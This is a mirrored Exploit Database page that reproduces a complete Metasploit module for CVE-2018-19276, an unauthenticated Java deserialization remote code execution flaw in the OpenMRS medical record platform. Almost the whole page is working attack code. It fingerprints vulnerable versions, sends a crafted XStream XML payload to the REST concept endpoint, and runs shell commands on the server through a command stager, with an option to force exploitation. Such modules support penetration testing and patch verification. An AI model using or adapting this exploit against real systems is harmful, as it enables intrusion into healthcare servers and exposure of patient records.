OpenMRS – Java Deserialization RCE (Metasploit)

• Exploit Database
• 121 阅读

• 作者： Metasploit
  日期： 2019-12-18
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/47792/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134

  ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;OpenMRS Java Deserialization RCE&apos;, &apos;Description&apos;=> %q( OpenMRS is an open-source platform that supplies users with a customizable medical record system.   There exists an object deserialization vulnerability in the <code>webservices.rest</code> module used in OpenMRS Platform. Unauthenticated remote code execution can be achieved by sending a malicious XML payload to a Rest API endpoint such as <code>/ws/rest/v1/concept</code>.   This module uses an XML payload generated with Marshalsec that targets the ImageIO component of the XStream library.   Tested on OpenMRS Platform <code>v2.1.2</code> and <code>v2.21</code> with Java 8 and Java 9. ), &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;Nicolas Serra&apos;, # Vuln Discovery and PoC &apos;mpgn&apos;,# PoC &apos;Shelby Pace&apos;# Metasploit Module ], &apos;References&apos; => [ [ &apos;CVE&apos;, &apos;2018-19276&apos; ], [ &apos;URL&apos;, &apos;https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607&apos; ], [ &apos;URL&apos;, &apos;https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization&apos; ], [ &apos;URL&apos;, &apos;https://github.com/mpgn/CVE-2018-19276/&apos; ] ], &apos;Platform&apos; => [ &apos;unix&apos;, &apos;linux&apos; ], &apos;Arch&apos; => [ ARCH_X86, ARCH_X64 ], &apos;Targets&apos;=> [ [ &apos;Linux&apos;, { &apos;Arch&apos; =>[ ARCH_X86, ARCH_X64 ], &apos;Platform&apos; =>[ &apos;unix&apos;, &apos;linux&apos; ], &apos;CmdStagerFlavor&apos;=> &apos;printf&apos; } ] ], &apos;DisclosureDate&apos; => &apos;2019-02-04&apos;, &apos;DefaultTarget&apos;=> 0 ))   register_options( [ Opt::RPORT(8081), OptString.new(&apos;TARGETURI&apos;, [ true, &apos;Base URI for OpenMRS&apos;, &apos;/&apos; ]) ])   register_advanced_options([ OptBool.new(&apos;ForceExploit&apos;, [ false, &apos;Override check result&apos;, false ]) ]) end   def check res = send_request_cgi!(&apos;method&apos; => &apos;GET&apos;, &apos;uri&apos; => normalize_uri(target_uri.path)) return CheckCode::Unknown("OpenMRS page unreachable.") unless res   return CheckCode::Safe(&apos;Page discovered is not OpenMRS.&apos;) unless res.body.downcase.include?(&apos;openmrs&apos;) response = res.get_html_document version = response.at(&apos;body//h3&apos;) return CheckCode::Detected(&apos;Successfully identified OpenMRS, but cannot detect version&apos;) unless version && version.text   version_no = version.text version_no = version_no.match(/\d+\.\d+\.\d*/) return CheckCode::Detected(&apos;Successfully identified OpenMRS, but cannot detect version&apos;) unless version_no   version_no = Gem::Version.new(version_no)   if (version_no < Gem::Version.new(&apos;1.11.8&apos;) || version_no.between?(Gem::Version.new(&apos;2&apos;), Gem::Version.new(&apos;2.1.3&apos;))) return CheckCode::Appears("OpenMRS platform version: #{version_no}") end   CheckCode::Safe end   def format_payload payload_data = payload.encoded.to_s.encode(xml: :text) payload_arr = payload_data.split(&apos; &apos;, 3) payload_arr.map { |arg| "<string>#{arg}</string>" }.join.gsub("&apos;", "") end   def read_payload_data(payload_cmd) # payload generated with Marshalsec erb_path = File.join(Msf::Config.data_directory, &apos;exploits&apos;, &apos;CVE-2018-19276&apos;, &apos;payload.erb&apos;) payload_data = File.binread(erb_path) payload_data = ERB.new(payload_data).result(binding)   rescue Errno::ENOENT fail_with(Failure::NotFound, "Failed to find erb file at the given path: #{erb_path}") end   def execute_command(cmd, opts={}) cmd = cmd.encode(xml: :text) xml_data = "<string>sh</string><string>-c</string><string>#{cmd}</string>" rest_uri = normalize_uri(target_uri.path, &apos;ws&apos;, &apos;rest&apos;, &apos;v1&apos;, &apos;concept&apos;) payload_data = read_payload_data(xml_data)   send_request_cgi( &apos;method&apos;=>&apos;POST&apos;, &apos;uri&apos; =>rest_uri, &apos;headers&apos; =>{ &apos;Content-Type&apos;=>&apos;text/xml&apos; }, &apos;data&apos;=>payload_data ) end   def exploit chk_status = check print_status(&apos;Target is running OpenMRS&apos;) if chk_status == CheckCode::Appears unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore[&apos;ForceExploit&apos;] ) fail_with(Failure::NoTarget, &apos;Target is not vulnerable&apos;) end   cmds = generate_cmdstager(:concat_operator => &apos;&&&apos;) print_status(&apos;Sending payload...&apos;) cmds.first.split(&apos;&&&apos;).map { |cmd| execute_command(cmd) } end end